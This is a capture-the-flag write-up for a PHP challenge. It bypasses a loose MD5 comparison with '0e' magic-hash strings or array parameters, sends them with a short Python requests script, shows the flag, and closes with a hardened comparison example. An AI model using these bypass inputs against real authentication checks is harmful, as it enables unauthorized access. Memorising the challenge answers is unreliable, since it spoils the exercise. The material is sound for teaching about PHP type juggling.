0x01 Open the challenge environment
The page shows the following source:
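<?php
// Print this file's own source (the underscores of __FILE__ were lost in the original listing)
highlight_file(__FILE__);
include 'flag2.php';
if (isset($_GET['name']) && isset($_POST['password'])) {
    $name = $_GET['name'];
    $password = $_POST['password'];
    // Loose comparisons: != on the inputs, == on the MD5 digests
    if ($name != $password && md5($name) == md5($password)) {
        echo $flag;
    }
    else {
        echo "wrong!";
    }
}
else {
    echo 'wrong!';
}
?>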
wrong!
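The important part of the code is
if ($name != $password && md5($name) == md5($password)) {
    echo $flag;
}
Both conditions around && must hold: the value of name must not equal the value of password, yet md5($name) must compare equal to md5($password) under the loose == operator. When both hold, the flag is printed.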
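0x02 Solving the challenge and getting the flag
1. Pass values whose MD5 digests start with 0e followed only by digits. Under loose comparison PHP reads such a digest as a number in scientific notation, which evaluates to 0, so the two MD5 values compare equal while the values of the variables themselves differ.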
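Reference list of 0e values: https://www.bbsmax.com/A/kmzLxxDYzG/ (use the ones that start with s!)
For example
name=s878926199a
password=s155964671a
Send the parameters
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}
2. Bypass with arrays. md5() cannot hash an array, so both MD5 results are NULL, which satisfies the condition that the two MD5 values are equal.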
name[]=n
password[]=n
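Here 'n' can be any number; give the two parameters different values so that $name != $password still holds.
Send the parameters
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}
3. Using a Python script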
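import requests

# URL of the site
url = "http://node2.anna.nssctf.cn:28014/"
# name parameter, passed via GET
name = "s878926199a"
# password parameter, passed via POST
password = "s155964671a"
# The MD5 digests of both parameters start with 0e and are followed only by digits
# Send the POST request with the GET query parameter attached, and get the response object
response = requests.post(url, data={"password": password}, params={"name": name})
# Print the text of the response
print(response.text)
Method 3 (the script) can be combined with methods 1 and 2.
The printed response.text contains the flag.
Run it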
flag=NSSCTF{b778dd89-aaac-4941-ad61-5a7c973938e5}
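The check from this challenge next to a hardened version, covering both the 0e strings and the array parameters described above. This is an added example, not part of the original write-up; the function names loose_check and strict_check and the sample inputs are constructed for illustration.

```php
<?php
// Added example, not the challenge's code. Function names are hypothetical.

// The challenge's check with its behaviour unchanged: loose != and ==.
function loose_check($name, $password): bool
{
    return $name != $password && md5($name) == md5($password);
}

// Hardened: accept only strings, then compare the digests byte for byte.
function strict_check($name, $password): bool
{
    if (!is_string($name) || !is_string($password)) {
        return false;               // rejects name[]=... array parameters
    }
    // !== and hash_equals() never reinterpret "0e..." digests as numbers,
    // so only a genuine MD5 collision between different strings could pass.
    return $name !== $password
        && hash_equals(md5($name), md5($password));
}

// Constructed inputs: the two strings and the array form used on this page.
$cases = [
    '0e strings' => ['s878926199a', 's155964671a'],
    'arrays'     => [['1'], ['2']],
];

foreach ($cases as $label => [$name, $password]) {
    try {
        // @ hides the PHP 7 warning raised when md5() is handed an array.
        $loose = @loose_check($name, $password);
    } catch (TypeError $e) {
        $loose = false;             // PHP 8: md5() rejects arrays outright
    }
    $strict = strict_check($name, $password);
    printf("%-10s loose=%s strict=%s\n", $label,
        var_export($loose, true), var_export($strict, true));
}
```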